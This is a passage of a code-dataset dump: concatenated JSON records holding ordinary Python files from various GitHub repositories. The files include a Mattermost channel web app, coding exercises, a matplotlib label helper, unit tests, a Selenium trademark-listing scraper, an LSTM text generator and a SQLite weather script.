'\n\ndef _infrelated(catalog):\n\treturn catalog['subject_de'] in ('Informatik', 'Wirtschaftsinformatik')\\\n\t\tor catalog['name_de'] == 'Transferable Skills'\\\n\t\tor catalog['name_de'] == 'Katalog Für alle Hörerinnen/Hörer'\n\n@bottle.route('/channel_by_course_code/', method=('GET', 'POST'))\ndef channel_by_course_code(code):\n\tconn = sqlite3.connect(utils.DBFILE)\n\tcur = conn.cursor()\n\tcur.execute('SELECT name FROM code_to_name WHERE code = ?', (code,))\n\trow = cur.fetchone()\n\n\tif row is not None:\n\t\treturn bottle.redirect(utils.CHANNEL_PREFIX + row[0])\n\n\tres = utils.toss_api('/courses/' + code)\n\tif res.status_code != 200:\n\t\treturn bottle.HTTPError(404, 'TOSS could not find this course')\n\n\tcourse = res.json()\n\tchname = utils.channel_name(course['name_de'])\n\n\tres = utils.mm_api(f'/teams/{utils.VOWI_TEAMID}/channels/name/{chname}')\n\n\tif res.status_code == 200:\n\t\tcur.execute('INSERT INTO code_to_name (code, name) VALUES (?, ?)', (code, chname))\n\t\tconn.commit()\n\t\treturn bottle.redirect(utils.CHANNEL_PREFIX + chname)\n\n\tif not any([_infrelated(x) for x in course['mapping']]):\n\t\treturn bottle.HTTPError(403, 'mattermost.fsinf.at is only for informatics related courses'\\\n\t\t\t\t' and this course does not seem to be associated with'\\\n\t\t\t\t' Informatics, Business Informatics or the Transferable Skills.')\n\n\tif bottle.request.method == 'GET':\n\t\treturn f'

There currently is no channel for {html.escape(course[\"name_en\"])},'\\\n\t\t\t\t' but you can create one:

'\\\n\t\t\tf'
'\n\n\telif bottle.request.method == 'POST':\n\t\tres = utils.mm_api('/channels', method='post', json={\n\t\t\t'team_id': utils.VOWI_TEAMID,\n\t\t\t'name': chname,\n\t\t\t'display_name': course['name_de'][:64],\n\t\t\t'header': utils.channel_header(course),\n\t\t\t'type': 'O'\n\t\t})\n\t\tif res.status_code == 201:\n\t\t\tcur.execute('INSERT INTO code_to_name (code, name) VALUES (?, ?)', (code, chname))\n\t\t\tconn.commit()\n\t\t\treturn bottle.redirect(utils.CHANNEL_PREFIX + chname)\n\t\telse:\n\t\t\tprint(res.json())\n\t\t\treturn bottle.HTTPError(500, 'Channel creation failed')\n\nif __name__ == '__main__':\n\tbottle.run(port=8180)\n","repo_name":"fsinf/mm-glue","sub_path":"serve.py","file_name":"serve.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25639053716","text":"number = float(input())\nbase, precision, min_value, max_value = input().split()\nbase = int(base)\nprecision = int(precision)\nmin_value = int(min_value)\nmax_value = int(max_value)\n\ndef representationDecimalNumbers(number: float, base: int, precision: int, min_value: int, max_value: int):\n value = number\n binary = \"\"\n partInt = 0\n contZero = 0\n partFrac = 0.0\n top_value = False\n \n while len(binary) < precision:\n _value = value * base\n partInt = int(_value)\n partFrac = _value - partInt\n \n if partInt == 1:\n top_value = True \n if top_value:\n binary += str(partInt)\n else:\n contZero += 1\n \n value = partFrac\n\n print(\"0.{} {}\".format(binary.ljust(precision, '0'), -contZero))\n\nrepresentationDecimalNumbers(number, base, precision, min_value, max_value)","repo_name":"Outro-Lucas/matematica-computacional","sub_path":"1. ERROS/2. Representação de números decimais.py","file_name":"2. Representação de números decimais.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4971673420","text":"from __future__ import annotations\n\nimport math\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom matplotlib.collections import PolyCollection\n\nimport numpy as np\nfrom numpy.typing import ArrayLike\n\nimport numpy\n\n\ndef nnls(A, b, eps: float = 1.0e-10, max_steps: int = 100):\n # non-negative least-squares after\n # \n A = numpy.asarray(A)\n b = numpy.asarray(b)\n\n AtA = A.T @ A\n Atb = A.T @ b\n\n m, n = A.shape\n assert m == b.shape[0]\n mask = numpy.zeros(n, dtype=bool)\n x = numpy.zeros(n)\n w = Atb\n s = numpy.zeros(n)\n k = 0\n while sum(mask) != n and max(w) > eps:\n if k >= max_steps:\n break\n mask[numpy.argmax(w)] = True\n\n s[mask] = numpy.linalg.lstsq(AtA[mask][:, mask], Atb[mask], rcond=None)[0]\n s[~mask] = 0.0\n\n while numpy.min(s[mask]) <= 0:\n alpha = numpy.min(x[mask] / (x[mask] - s[mask]))\n x += alpha * (s - x)\n mask[numpy.abs(x) < eps] = False\n\n s[mask] = numpy.linalg.lstsq(AtA[mask][:, mask], Atb[mask], rcond=None)[0]\n s[~mask] = 0.0\n\n x = s.copy()\n w = Atb - AtA @ x\n\n k += 1\n\n return x\n\n\ndef move_min_distance(targets: ArrayLike, min_distance: float) -> np.ndarray:\n \"\"\"Move the targets such that they are close to their original positions, but keep\n min_distance apart.\n\n https://math.stackexchange.com/a/3705240/36678\n \"\"\"\n # sort targets\n idx = np.argsort(targets)\n targets = np.sort(targets)\n\n n = len(targets)\n x0_min = targets[0] - n * min_distance\n A = np.tril(np.ones([n, n]))\n b = targets - (x0_min + np.arange(n) * min_distance)\n\n # import scipy.optimize\n # out, _ = scipy.optimize.nnls(A, b)\n\n out = nnls(A, b)\n\n sol = np.cumsum(out) + x0_min + np.arange(n) * min_distance\n\n # reorder\n idx2 = np.argsort(idx)\n return sol[idx2]\n\n\ndef get_mid_y(c: PolyCollection):\n points = c.get_paths()[0].vertices\n # x = points[1:, 0].reshape(2, int(points[:, 1].size / 2))\n # x_high = x[0]\n # x_low = x[1]\n\n y = points[1:, 1].reshape(2, int(points[:, 1].size / 2))\n y_high = y[0]\n y_low = y[1]\n\n return (y_high[-2] + y_low[0]) / 2\n\n\ndef label_fillbetween(\n min_label_distance: float or str = \"auto\",\n alpha_optimize: float = 1.0,\n **text_kwargs,\n):\n ax = plt.gca()\n\n logy = ax.get_yscale() == \"log\"\n\n if min_label_distance == \"auto\":\n # Make sure that the distance is alpha * fontsize. This needs to be translated\n # into axes units.\n fig = plt.gcf()\n fig_height_inches = fig.get_size_inches()[1]\n ax = plt.gca()\n ax_pos = ax.get_position()\n ax_height = ax_pos.y1 - ax_pos.y0\n ax_height_inches = ax_height * fig_height_inches\n ylim = ax.get_ylim()\n if logy:\n ax_height_ylim = math.log10(ylim[1]) - math.log10(ylim[0])\n else:\n ax_height_ylim = ylim[1] - ylim[0]\n # 1 pt = 1/72 in\n fontsize = mpl.rcParams[\"font.size\"]\n assert fontsize is not None\n min_label_distance_inches = fontsize / 72 * alpha_optimize\n min_label_distance = (\n min_label_distance_inches / ax_height_inches * ax_height_ylim\n )\n\n # Add \"legend\" entries.\n # Get last non-nan y-value.\n targets = []\n for c in plt.gca().collections:\n if not isinstance(c, PolyCollection):\n continue\n\n targets.append(get_mid_y(c))\n\n if logy:\n targets = [math.log10(t) for t in targets]\n\n # Sometimes, the max value if beyond ymax. It'd be cool if in this case we could put\n # the label above the graph (instead of the to the right), but for now let's just\n # cap the target y.\n ymax = ax.get_ylim()[1]\n targets = [min(target, ymax) for target in targets]\n\n targets = move_min_distance(targets, min_label_distance)\n if logy:\n targets = [10**t for t in targets]\n\n labels = [\n c.get_label() for c in plt.gca().collections if isinstance(c, PolyCollection)\n ]\n alphas = [\n c.get_alpha() for c in plt.gca().collections if isinstance(c, PolyCollection)\n ]\n colors = [\n c.get_facecolor()\n for c in plt.gca().collections\n if isinstance(c, PolyCollection)\n ]\n\n axis_to_data = ax.transAxes + ax.transData.inverted()\n xpos = axis_to_data.transform([1.03, 1.0])[0]\n\n for label, ypos, color, alpha in zip(labels, targets, colors, alphas):\n plt.text(\n xpos,\n ypos,\n label,\n verticalalignment=\"center\",\n alpha=alpha,\n color=color[0],\n **text_kwargs,\n )\n","repo_name":"RemDelaporteMathurin/3d_monoblocks","sub_path":"baking/matplotx_proxy.py","file_name":"matplotx_proxy.py","file_ext":"py","file_size_in_byte":4706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30638703847","text":"# 백준 단계별 풀이 9단계 - 소수 구하기\n# https://www.acmicpc.net/problem/1929\n\n# def check_yaksoo(n):\n# if n == 1:\n# return False\n# else:\n# for i in range(2, int(n ** 0.5) + 1):\n# if n % i == 0:\n# return False\n# return True\n\n# m, n = map(int, input().split())\n# for i in range(m, n + 1):\n# if check_yaksoo(i):\n# print(i)\n\n# 에라토스테네스의 체를 이용한 방식\n\n#n 이하의 체를 구하는 함수\ndef prime(n):\n #0과1은 소수가아니므로 False, 나머지 2부터 n까지는 n-1개임\n\tseive = [False, False] + [ True ] * (n-1)\n\tk = int(n ** 0.5)\n\n\t#2~ 루트n + 1까지\n\tfor i in range(2, k+1):\n\t\tif seive[i]:\n\t\t\tfor j in range(i+i, n+1, i):\n\t\t\t\tseive[j] = False\n\treturn [ i for i in range(2, n+1) if seive[i] == True]\n\nm, n = map(int, input().split())\nprime_list = prime(n)\nfor i in prime_list:\n\tif i < m:\n\t\tcontinue\n\tprint(i)\n","repo_name":"devraphy/algorithm","sub_path":"baekjoon/step9_math2/1929_star.py","file_name":"1929_star.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29399727629","text":"def palindromo(palabra):\n palabra=list(palabra)\n a=palabra[0]\n b=palabra[len(palabra)-1]\n if len(palabra)==1:\n return True\n if a==b:\n palabra.remove(a)\n palabra.remove(b)\n return palindromo(palabra)\n if a!=b:\n return False\n return\n\nif __name__==\"__main__\":\n print(palindromo(\"oso\"))\n print(palindromo(\"dinosaurio\"))\n \n\n ","repo_name":"pabloschwarzenberg/grader","sub_path":"tema11_ej1/tema11_ej1_ded15abd5c16cd505e828817e4ded25e.py","file_name":"tema11_ej1_ded15abd5c16cd505e828817e4ded25e.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4968456295","text":"'''\n\n案例:中国商标网公告爬虫(selenium)\nhttp://wsgg.sbj.cnipa.gov.cn:9080/tmann/annInfoView/homePage.html\nhttp://wsgg.sbj.cnipa.gov.cn:9080/tmann/annInfoView/annSearch.html?annNum=1654\n爬取期号为1654的公告信息:序号,期号,公告日期,注册号,申请人,商标名称\n\n'''\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\nimport random\nimport re\n\nbrowser = webdriver.Chrome()\nbrowser.maximize_window()\n# 定义等待条件\nwait = WebDriverWait(browser, 60)\ntry:\n browser.get('http://wsgg.sbj.cnipa.gov.cn:9080/tmann/annInfoView/homePage.html')\n # 输入框\n tb_input = wait.until(\n EC.presence_of_element_located((By.CSS_SELECTOR, '#annNum'))\n )\n # 按钮\n search_btn = wait.until(\n EC.presence_of_element_located((By.CSS_SELECTOR, '#annNumSubmit'))\n )\n tb_input.clear()\n tb_input.send_keys('1654')\n time.sleep(3)\n\n search_btn.click()\n # 等待搜索结果中的条目加载完成\n wait.until(\n # EC.presence_of_element_located((By.CSS_SELECTOR, '.jsTj.w1008'))\n EC.presence_of_element_located((By.CSS_SELECTOR, '.searchAnnnum'))\n )\n # 等待加载页数元素\n total = wait.until(\n EC.presence_of_element_located((By.CSS_SELECTOR, '#pages'))\n )\n total = total.text.strip()\n pat = re.compile(r'(\\d+)')\n match_obj = pat.search(total)\n if match_obj:\n total = int(match_obj.group(1))\n else:\n total = 1\n print(f'total:{total}')\n page = 1\n while True:\n print(f\"正在加载第{page}页\")\n # 等待搜索结果中的条目加载完成\n wait.until(\n # EC.presence_of_element_located((By.CSS_SELECTOR, '.jsTj.w1008'))\n EC.presence_of_element_located((By.CSS_SELECTOR, '.searchAnnnum'))\n )\n ls = browser.find_elements_by_xpath('//tr[@class=\"evenBj\"]')\n browser.execute_script('window.scrollTo(0,document.body.scrollHeight);')\n time.sleep(random.random())\n print(f'len:{len(ls)}')\n for item in ls:\n print(item.text)\n\n serial_number = item.find_element_by_xpath('.//td[1]').text.strip()\n print(f'serial_number:{serial_number}')\n lssue_number = item.find_element_by_xpath('.//td[2]/a').text.strip()\n print(f'lssue_number:{lssue_number}')\n announcement_date = item.find_element_by_xpath('.//td[3]').text.strip()\n print(f'announcement_date:{announcement_date}')\n # registration_number, applicant, trade_name\n registration_number = item.find_element_by_xpath('.//td[5]').text.strip()\n print(f'registration_number:{registration_number}')\n applicant = item.find_element_by_xpath('.//td[6]').text.strip()\n print(f'applicant:{applicant}')\n trade_name = item.find_element_by_xpath('.//td[7]').text.strip()\n print(f'trade_name:{trade_name}')\n print('=' * 99)\n # 翻页\n if page <= total:\n page += 1\n browser.execute_script('window.scrollTo(0,document.body.scrollHeight-500);')\n btn_next = browser.find_element_by_xpath('//*[@id=\"pages\"]/table/tbody/tr/td[8]/a')\n\n print('next page ...')\n # 移动鼠标去点击下一页\n # ActionChains(browser).move_to_element(next_page_btn).click().perform()\n btn_next.click()\n time.sleep(3)\n else:\n break\n\n time.sleep(random.random())\n\nexcept Exception as e:\n print(e)\nfinally:\n browser.quit()\n","repo_name":"1987617587/lsh_py","sub_path":"pachong/PCdemo1/day08/刘士豪20200401/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"4272776565","text":"import io\nimport os\nimport unittest\nfrom unittest import mock\n\nfrom opentrons.robot import Robot\n\nfrom server import helpers\n\n\nclass MiscHelpersTestCase(unittest.TestCase):\n def setUp(self):\n Robot.reset_for_tests()\n self.robot = Robot.get_instance()\n self.robot.connect()\n\n def test_convert_bytes_stream_to_str(self):\n text = ['line 1', 'line 2', 'foo bar']\n bytes_stream = io.BytesIO()\n [bytes_stream.write(i.encode()) for i in text]\n bytes_stream.seek(0)\n text_res = helpers.convert_byte_stream_to_str(bytes_stream)\n self.assertEqual(''.join(text), text_res)\n\n def test_get_upload_proof_robot(self):\n methods = [\n 'connect',\n 'disconnect',\n 'move_head',\n 'move_plunger',\n 'reset',\n 'run',\n 'simulate'\n ]\n\n real_list = [getattr(self.robot, i) for i in methods]\n [setattr(self.robot, i, mock.Mock()) for i in methods]\n mock_list = [getattr(self.robot, i) for i in methods]\n\n patched_robot, restore = helpers.get_upload_proof_robot(self.robot)\n\n # Call all methods after patching\n [getattr(patched_robot, i)(patched_robot) for i in methods]\n\n # Assert none of the real methods were called after patching\n [self.assertFalse(i.called) for i in mock_list]\n\n robot = restore()\n [getattr(robot, i)(patched_robot) for i in methods]\n\n [self.assertTrue(i.called) for i in mock_list]\n\n # Restore real methods\n [setattr(self.robot, i, real_list.pop(0)) for i in methods]\n\n\nclass LoadJSONTestCase(unittest.TestCase):\n def setUp(self):\n Robot.reset_for_tests()\n self.robot = Robot.get_instance()\n self.robot.connect()\n\n def get_json_protocol_stream(self, name):\n return open(\n os.path.join(os.path.dirname(__file__), '..', 'data', name),\n 'rb'\n )\n\n def get_good_json_protocol_stream(self):\n return self.get_json_protocol_stream('good_json_protocol.json')\n\n def get_bad_json_protocol_stream(self):\n return self.get_json_protocol_stream('bad_json_protocol.json')\n\n def get_invalid_json_protocol_stream(self):\n return self.get_json_protocol_stream('invalid_json_protocol.json')\n\n def test_load_json_with_good_protocol(self):\n stream = self.get_good_json_protocol_stream()\n api_resp_result = helpers.load_json(stream)\n api_resp_expected = {'errors': [], 'warnings': []}\n self.assertDictEqual(api_resp_expected, api_resp_result)\n\n def test_load_json_with_bad_protocol(self):\n stream = self.get_bad_json_protocol_stream()\n api_resp_result = helpers.load_json(stream)\n self.assertEqual(len(api_resp_result['errors']), 2)\n self.assertEqual(len(api_resp_result['warnings']), 0)\n\n def test_load_json_with_invalid_protocol(self):\n stream = self.get_invalid_json_protocol_stream()\n api_resp_result = helpers.load_json(stream)\n self.assertEqual(len(api_resp_result['errors']), 1)\n self.assertEqual(\n api_resp_result['errors'][0], 'Cannot parse invalid JSON'\n )\n","repo_name":"cristhiand3/opentrons-app","sub_path":"server/tests/helpers/test_helpers.py","file_name":"test_helpers.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"111526683","text":"#!/usr/bin/env python\n#file test_make_otu_table\n\n__author__ = \"Rob Knight\"\n__copyright__ = \"Copyright 2010, The QIIME Project\" #consider project name\n__credits__ = [\"Rob Knight\", \"Justin Kuczynski\"] #remember to add yourself\n__license__ = \"GPL\"\n__version__ = \"1.1.0\"\n__maintainer__ = \"Rob Knight\"\n__email__ = \"rob@spot.colorado.edu\"\n__status__ = \"Release\"\n\nfrom cogent.util.unit_test import TestCase, main\nfrom qiime.make_otu_table import (libs_from_seqids,\n seqids_from_otu_to_seqid, make_otu_map)\n\nclass TopLevelTests(TestCase):\n \"\"\"Tests of top-level functions\"\"\"\n def test_libs_from_seqids(self):\n \"\"\"libs_from_seqids should identify correct libs\"\"\"\n seqids = ['ABC_001', 'DEF_002', 'ABC_003', 'GHI_JKL_001']\n self.assertEqual(libs_from_seqids(seqids),\n set(['ABC', 'DEF', 'GHI_JKL']))\n\n def test_seqids_from_otu_to_seqid(self):\n \"\"\"seqids_from_otu_to_seqid should return right seqids\"\"\"\n otu_to_seqid ={'0':['ABC_0','DEF_1'],'x':['GHI_2']}\n self.assertEqual(seqids_from_otu_to_seqid(otu_to_seqid),\n set(['ABC_0', 'DEF_1', 'GHI_2']))\n\n def test_make_otu_map_no_taxonomy(self):\n \"\"\"make_otu_map should work without supplied taxonomy\"\"\"\n otu_to_seqid ={ '0':['ABC_0','DEF_1'],\n '1':['ABC_1'],\n 'x':['GHI_2', 'GHI_3','GHI_77'],\n 'z':['DEF_3','XYZ_1']\n }\n obs = make_otu_map(otu_to_seqid)\n exp = \"\"\"#Full OTU Counts\n#OTU ID\\tABC\\tDEF\\tGHI\\tXYZ\n0\\t1\\t1\\t0\\t0\n1\\t1\\t0\\t0\\t0\nx\\t0\\t0\\t3\\t0\nz\\t0\\t1\\t0\\t1\"\"\"\n self.assertEqual(obs, exp)\n\n def test_make_otu_map_taxonomy(self):\n \"\"\"make_otu_map should work with supplied taxonomy\"\"\"\n otu_to_seqid ={ '0':['ABC_0','DEF_1'],\n '1':['ABC_1'],\n 'x':['GHI_2', 'GHI_3','GHI_77'],\n 'z':['DEF_3','XYZ_1']\n }\n taxonomy = {'0':'Bacteria;Firmicutes', 'x':'Bacteria;Bacteroidetes'}\n obs = make_otu_map(otu_to_seqid, taxonomy)\n exp = \"\"\"#Full OTU Counts\n#OTU ID\\tABC\\tDEF\\tGHI\\tXYZ\\tConsensus Lineage\n0\\t1\\t1\\t0\\t0\\tBacteria;Firmicutes\n1\\t1\\t0\\t0\\t0\\tNone\nx\\t0\\t0\\t3\\t0\\tBacteria;Bacteroidetes\nz\\t0\\t1\\t0\\t1\\tNone\"\"\"\n self.assertEqual(obs, exp)\n\n\nif __name__ =='__main__':\n main()\n","repo_name":"clovr/clovr-base","sub_path":"hudson/hudson-scripts/qiime/test_make_otu_table.py","file_name":"test_make_otu_table.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"8199851073","text":"import pandas as pd\n\nfrom sklearn.metrics import mean_squared_error\nfrom datetime import timedelta\n\nimport xgboost as xgb\n\nfrom prefect import flow, task\nfrom prefect.task_runners import SequentialTaskRunner\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\n\nimport xgboost as xgb\n\n\n@task\ndef load_data(path):\n data = pd.read_csv(path)\n data['ever_married'] = [0 if i != 'Yes' else 1 for i in data['ever_married']]\n data['gender'] = [0 if i != 'Female' else 1 for i in data['gender']]\n data = pd.get_dummies(\n data, columns=['work_type', 'Residence_type', 'smoking_status'])\n return data\n\n\n@task(retries=3)\ndef generate_datasets(df):\n X = df.drop(['stroke'], axis=1)\n y = df['stroke']\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.30, random_state=42)\n return X_train, X_test, y_train, y_test\n\n\n@task\ndef train_model(X_train, X_test, y_train, y_test):\n best_params = {\n \"criterion\": 'gini',\n \"max_depth\": None,\n \"min_samples_split\": 2,\n \"min_samples_leaf\": 1,\n \"min_weight_fraction_leaf\": 0,\n \"max_features\": None,\n \"random_state\": None,\n \"max_leaf_nodes\": None,\n \"min_impurity_decrease\": 0,\n \"class_weight\": None,\n \"ccp_alpha\": 0\n }\n\n clf_gini = DecisionTreeClassifier(**best_params)\n clf_gini.fit(X_train, y_train)\n return clf_gini\n\n\n@task\ndef estimate_quality(model, X_test, y_test):\n y_pred_gini = model.predict(X_test)\n return mean_squared_error(y_test, y_pred_gini, squared=False)\n\n\n@flow(task_runner=SequentialTaskRunner())\ndef nyc_duration_flow():\n df = load_data('data/full_data.csv')\n X_train, X_val, y_train, y_val = generate_datasets(\n df).result()\n model = train_model(X_train, X_val, y_train, y_val)\n rmse = estimate_quality(model, X_val, y_val)\n\n\nnyc_duration_flow()\n","repo_name":"aaoeclipse/m13-ml-industrial-final","sub_path":"duration_workflow.py","file_name":"duration_workflow.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35416125133","text":"# Reference: https://github.com/rdcolema/word-level-rnn-for-text-generation/blob/master/word_gen.py\n\nimport random\n\nimport numpy as np\nfrom keras.layers.core import Dense, Dropout\nfrom keras.layers.recurrent import LSTM\nfrom keras.models import Sequential, model_from_json\n\nfrom download_review_data import get_artifact_app_id\nfrom export_review_data import get_output_file_name\n\n\ndef get_model_architecture_file_name():\n return 'word_level_rnn_model_architecture.h5'\n\n\ndef get_model_weights_file_name():\n return 'word_level_rnn_model_weights.h5'\n\n\ndef sample(a, temperature=1.0):\n # helper function to sample an index from a probability array\n a = np.log(a) / temperature\n a = np.exp(a) / np.sum(np.exp(a))\n if sum(a) > 1.0: # occasionally getting 1.00000X, so handling for that\n a *= 0.999\n return np.argmax(np.random.multinomial(1, a, 1))\n\n\ndef train(path, maxlen=30):\n \"\"\"trains the LSTM model on text corpora\"\"\"\n\n try:\n text = open(path).read().lower()\n except UnicodeDecodeError:\n import codecs\n\n text = codecs.open(path, encoding='utf-8').read().lower()\n\n print(f'corpus length: {len(text)}')\n\n chars = set(text)\n words = set(text.split())\n\n print(f\"total number of unique words: {len(words)}\")\n print(f\"total number of unique chars: {len(chars)}\")\n\n word_indices = {c: i for i, c in enumerate(words)}\n indices_word = {i: c for i, c in enumerate(words)}\n\n step = 3\n\n print(f\"maxlen: {maxlen} ; step: {step}\")\n\n sentences = []\n next_words = []\n list_words = text.lower().split()\n\n for i in range(0, len(list_words) - maxlen, step):\n sentences2 = ' '.join(list_words[i : i + maxlen])\n sentences.append(sentences2)\n next_words.append(list_words[i + maxlen])\n\n print(f'length of sentence list: {len(sentences)}')\n print(f\"length of next_word list: {len(next_words)}\")\n\n print('Vectorization...')\n X = np.zeros((len(sentences), maxlen, len(words)), dtype=np.bool)\n y = np.zeros((len(sentences), len(words)), dtype=np.bool)\n for i, sentence in enumerate(sentences):\n for t, word in enumerate(sentence.split()):\n X[i, t, word_indices[word]] = 1\n y[i, word_indices[next_words[i]]] = 1\n\n # build the model: 2 stacked LSTM\n\n print('Building model...')\n\n model = Sequential()\n model.add(LSTM(512, return_sequences=True, input_shape=(maxlen, len(words))))\n model.add(Dropout(0.5))\n model.add(LSTM(512, return_sequences=False))\n model.add(Dropout(0.5))\n model.add(Dense(len(words), activation='softmax'))\n\n model.compile(loss='categorical_crossentropy', optimizer='adam')\n\n try:\n model.load_weights(get_model_weights_file_name())\n except Exception as e:\n print(e)\n pass\n\n # train the model, output generated text after each iteration\n\n for iteration in range(1, 750):\n print(f'Iteration {iteration}')\n\n model.fit(X, y, batch_size=500, nb_epoch=3)\n json_string = model.to_json()\n with open(get_model_architecture_file_name(), 'w') as f:\n f.write(json_string)\n model.save_weights(get_model_weights_file_name(), overwrite=True)\n\n return model\n\n\ndef generate_from_word_level_rnn(\n path,\n maxlen=30,\n diversity=1.0,\n min_sent_len=10,\n max_sent_len=65,\n):\n with open(path, encoding='utf-8') as f:\n text = f.read().lower().split()[:4940]\n words = set(text)\n start_index = random.randint(0, len(text) - maxlen - 1)\n word_indices = {c: i for i, c in enumerate(words)}\n indices_word = {i: c for i, c in enumerate(words)}\n\n response = \"\"\n model = model_from_json(open(path).read())\n model.load_weights(get_model_weights_file_name())\n model.compile(loss='categorical_crossentropy', optimizer='rmsprop')\n sentence = text[start_index : start_index + maxlen]\n\n for _i in range(random.randint(min_sent_len, max_sent_len)):\n x = np.zeros((1, maxlen, len(words)))\n for t, word in enumerate(sentence):\n x[0, t, word_indices[word]] = 1.0\n preds = model.predict(x, verbose=0)[0]\n next_index = sample(preds, diversity)\n next_word = indices_word[next_index]\n if not response:\n response += f' {next_word}'\n else:\n if response.split()[-1] != next_word:\n response += f' {next_word}'\n del sentence[0]\n sentence.append(next_word)\n return response\n\n\ndef load_model():\n model = model_from_json(open(get_model_architecture_file_name()).read())\n model.load_weights(get_model_weights_file_name())\n model.compile(loss='categorical_crossentropy', optimizer='rmsprop')\n\n return model\n\n\nif __name__ == \"__main__\":\n app_id = get_artifact_app_id()\n text_file_name = get_output_file_name(app_id)\n model = train(path=text_file_name)\n response = generate_from_word_level_rnn(path=text_file_name)\n","repo_name":"woctezuma/sample-steam-reviews","sub_path":"word_level_rnn.py","file_name":"word_level_rnn.py","file_ext":"py","file_size_in_byte":4912,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"38946992237","text":"from __future__ import annotations\n\nimport json\nimport re\nfrom typing import Any, Generator\n\nfrom pyderman.util import downloader\nfrom pyderman.util.const import LINUX, MAC_ARM\n\n\ndef get_url(\n version: str = \"latest\", _os: str | None = None, _os_bit: str | None = None\n) -> tuple[str, str, str]:\n beta = True\n pattern = version\n bit = \"\"\n if not version or version == \"latest\":\n beta = False\n pattern = \"\"\n if _os == MAC_ARM:\n _os = \"mac\"\n if _os == LINUX:\n bit = \"64\" if _os_bit == \"64\" else \"i686\"\n for release in _releases():\n name = str(release[\"name\"]).lower()\n if not beta and \"beta\" in name:\n continue\n if _os is not None and _os in name and pattern in name and bit in name:\n ver = re.search(r\"(\\d{1,2}\\.\\d{1,2}\\.\\d{1,2})\", name)\n if ver is not None:\n return (\n \"phantomjs.*/bin/phantomjs\",\n release[\"links\"][\"self\"][\"href\"],\n str(ver.group(1)),\n )\n raise ValueError(f\"Unable to locate PhantomJSDriver version! [{version}]\")\n\n\ndef _releases() -> Generator[dict[str, Any], None, None]:\n page = \"https://api.bitbucket.org/2.0/repositories/ariya/phantomjs/downloads/\"\n while page:\n s = downloader.raw(page)\n if s is None:\n raise ValueError(f\"Unable to get page: {page}\")\n else:\n data = json.loads(s)\n for release in data[\"values\"]:\n yield release\n page = data[\"next\"] if \"next\" in data else None\n\n\nif __name__ == \"__main__\":\n print(get_url(\"latest\", \"win\", \"64\"))\n","repo_name":"shadowmoose/pyderman","sub_path":"pyderman/drivers/phantomjs.py","file_name":"phantomjs.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"77"} +{"seq_id":"12027465478","text":"# FALL 2021\n# SI 206\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\nimport os\nimport json\nimport csv\nimport sqlite3\nimport plotly.graph_objects as go\n\ndef setUpDatabase(db_name):\n \"\"\"\n Takes in the name of the database, a string, as the input. Returns the cursor and connection to the database.\n \"\"\"\n path = os.path.dirname(os.path.abspath(__file__))\n conn = sqlite3.connect(path+'/'+db_name)\n cur = conn.cursor()\n return cur, conn\n\n\ndef setUpSnowTable(file_name, curr, conn):\n \"\"\"\n Takes in the filename of the json file loaded from the API, the database cursor, and the database connections as inputs. Creates a table called\n Total_Snowfall and inserts the county_id and total snowfall for that county. Returns nothing. \n \"\"\"\n\n\n snow_data = open(file_name, 'r')\n snow_data_dict = json.loads(snow_data.read())\n value_list = snow_data_dict.items()\n curr.execute(\"CREATE TABLE IF NOT EXISTS Total_Snowfall (county_id INTEGER, snow_inches INTEGER)\")\n for item in value_list:\n curr.execute(\"SELECT id FROM Counties WHERE county = ?\", (item[0],))\n county_id = curr.fetchone()[0]\n curr.execute(\"INSERT INTO Total_Snowfall (county_id, snow_inches) VALUES (?,?)\", (county_id, item[1]))\n conn.commit()\n snow_data.close()\n\ndef setUpTempTable(file_name, cur, conn):\n \"\"\"\n Takes in the filename of the json file loaded from the API, the database cursor, and the database connections as inputs. Creates a table called\n Avg_Temp and inserts the county_id and average temperature of that county. Returns nothing. \n \"\"\"\n\n temp_data = open(file_name, 'r')\n temp_data_dict = json.loads(temp_data.read())\n value_list = temp_data_dict.items()\n cur.execute(\"CREATE TABLE IF NOT EXISTS Avg_Temp (county_id INTEGER, temp_f INTEGER)\")\n for item in value_list:\n cur.execute(\"SELECT id FROM Counties WHERE county = ?\", (item[0],))\n county_id = cur.fetchone()[0]\n cur.execute(\"INSERT INTO Avg_Temp (county_id, temp_f) VALUES (?,?)\", (county_id, item[1]))\n conn.commit()\n temp_data.close()\n\n\ndef summary_for_scatterplot(cur, conn):\n \"\"\"\n Takes in the database cursor and the database connections as inputs. Joins four tables based off of the county id numbers and selects the county name,\n number of fatal car crashes, total snowfall, and average temperature. Returns a list of tuples of these selected values. \n \"\"\"\n\n 